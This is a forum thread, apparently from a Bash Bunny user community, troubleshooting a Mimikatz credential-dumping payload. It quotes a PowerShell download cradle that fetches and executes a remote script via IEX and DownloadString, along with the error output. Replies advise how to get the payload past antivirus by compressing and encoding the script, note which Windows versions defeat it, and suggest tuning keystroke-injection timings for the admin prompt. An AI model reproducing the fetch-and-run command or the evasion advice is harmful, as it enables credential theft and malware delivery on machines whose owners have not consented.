Violation of CoC

[mule]

I'm using 1.3 FW on my bash bunny and I'm use .2 of the Mr. Robot (MIMIKATZ) payload. However, when its run on my test machine. I get the following error.
 

I removed the -W hidden from the powershell line, so I could see what was causing the failure. As you can see a bit further down, the 172.16.64.1 address is pingable, so I'm not really sure why I'm getting the unable to connect error or what other arguments are needed for DownloadString. Any help will be greatly appreciated!

C:\Windows\System32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}"

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:59
+ while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object

Net.We ...
+
~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

C:\Windows\System32>ping 172.16.64.1

Pinging 172.16.64.1 with 32 bytes of data:
Reply from 172.16.64.1: bytes=32 time<1ms TTL=64
Reply from 172.16.64.1: bytes=32 time<1ms TTL=64
Reply from 172.16.64.1: bytes=32 time<1ms TTL=64
Reply from 172.16.64.1: bytes=32 time<1ms TTL=64
 

[PoSHMagiC0de]

I planned this week to announce I am taking a break from my own 1000s of projects to have a change in pace by going through some BB projects by others and improving/fixing them for the 1.3 update.  This is one that may need an update but I have not ran this particular payload in a while.  For the BBTPS I only used his mimidogz script since mimikatz is detectable by everything.  Mimidogz itself works fine except on Win10 machines that have the Creator Update on it.

[thefragile99]

awesome!

[PoSHMagiC0de]

So, I did extensive testing of this payload.  I have a copy of his mimidogz at the totalp0wn payload so I know the script works.

1) If on Windows 10 with creator update, forget it, it will never work.

2) If you are running a virus scanner like Avast this payload in its current condition maybe stopped.  Avast I know will stop it.  It doesn't stop in the bbtps because I compress and encode it before transfering from the BB to my agent running on the machine, similar to the first script that is pulled down by this payload (ps.md).

If you are having issues, try disabling all virus scanners and try again.  I seen red on Windows 10 machines when it pulls nothing,  Red means it got nothing.

Also the quack timings may need to be adjust for the machine you are adding it to.  Maybe a little delay between the gui+r to give machine time to bring up run command.  Some time after running powershell as admin to allow for powershell to swap and give admin prompt and even time after hitting alt-y.  I also bee adding an extra return after the alt-Y pause in case it is one of those machines that do not prompt for admin permission and just runs the command prompt so I can return after my Y and have a clean commandline to run the cradle.

Recommendations for improvements.  Maybe compressing and encoding md.ps1 before sending it and putting in the p.ps1 file the code to put it back to english and run may help with the virus scanner issues seeing it in transit but test on win7 with all virus scanners off while this payload is in its current condition.

[Canomoly]

I used the script and now im just at a constant cyan inverted blink. I can not get passed this stage.